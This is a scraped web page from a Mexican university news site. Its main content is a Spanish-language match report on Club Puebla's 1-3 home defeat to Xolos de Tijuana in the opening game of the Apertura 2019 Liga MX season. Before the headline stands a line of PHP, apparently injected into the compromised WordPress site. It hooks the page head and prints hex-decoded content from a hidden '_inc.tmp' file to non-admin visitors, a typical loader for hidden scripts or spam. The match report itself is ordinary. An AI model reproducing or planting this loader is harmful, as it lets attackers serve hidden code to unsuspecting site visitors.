if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } El Puebla tropezó en el arranque del torneo Apertura 2019 – La Opinión Universitaria La Opinión Universitaria
Menu

El Puebla tropezó en el arranque del torneo Apertura 2019

*Los Franjiazules perdieron 1-3 con Xolos

 

En el partido que abrió el torneo Apertura 2019 de la Liga MX, el Club Puebla sufrió derrota de 1-3 ante Xolos de Tijuana, en la cancha del estadio Cuauhtémoc.

Con este resultado, La Franja se quedó sin unidades mientras que los fronterizos llegaron a tres puntos.

Al minuto 14 llegó el invitado. Lucas Cavallini orquestó una ofensiva que terminó en gol de su equipo. El canadiense recibió el balón, avanzó, dio tiempo y después habilitó a Christian Tabó por el sector derecha, éste se quitó a Gibrán Lajud para después empujar a la red. Era el 1-0.

Diez minutos después, el empate de Xolos llegó en un rebote que aprovechó Washington Camacho tras un disparo de Ariel Nahuelpan, el cual había rechazado Nicolás Vikonis. Era el 1-1.

Antes de irse al descanso, al 45’, Omar Fernández estuvo cerca de regresar la ventaja a los poblanos en un tiro de esquina, el volante remató y el balón apenas pasó por un lado del poste.

Para la parte complementaria, en el minuto 53, Alejandro Chumacero se combinó con Christian Tabó para que el dorsal “10” de La Franja buscara hacer daño con disparo a segundo poste, el cual fue atajado por Gibrán Lajud.

Al 77’, Xolos marcó el gol de la voltereta. Miler Bolaños metió servicio desde el sector derecho al corazón del área y apareció Ariel Nahuelpan con un testarazo contundente que terminó en la red. Era el 1-2.

En el minuto 90´+1´: Ángel Sepúlveda puso cifras definitivas. El ex jugador del Necaxa con pocos minutos en el terreno de juego marcó el tercer tanto de Xolos. Era el 1-3.

En la Fecha 2, los Camoteros descansarán; los fronterizos recibirán a Querétaro.

 

 

  • No comments

    Deja una respuesta

    Tweets recientes